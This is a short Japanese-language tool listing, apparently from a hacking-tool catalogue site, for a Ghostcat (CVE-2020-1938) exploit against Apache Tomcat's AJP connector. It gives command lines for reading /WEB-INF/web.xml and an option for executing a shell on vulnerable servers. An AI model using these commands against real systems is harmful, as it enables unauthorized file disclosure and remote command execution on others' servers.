ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!
CVE-2020-1938(Ghostcat)のエクスプロイト。AJPコネクタを介して、脆弱なApache Tomcatサーバー上でファイル読み取りとリモートコマンド実行を可能にします。
コミュニティで最も使われているツールを見つけましょう。
すべてのツールを探索
ツールコレクションを閲覧
1.ファイルを読み取る:
python3 tomcat.py URL -f /WEB-INF/web.xml
例:
python3 tomcat.py 127.0.0.1 -f /WEB-INF/web.xml -p 8090
2.シェルを実行
--rec 1 を追加
参照: https://www.t00ls.net/articles-55062.html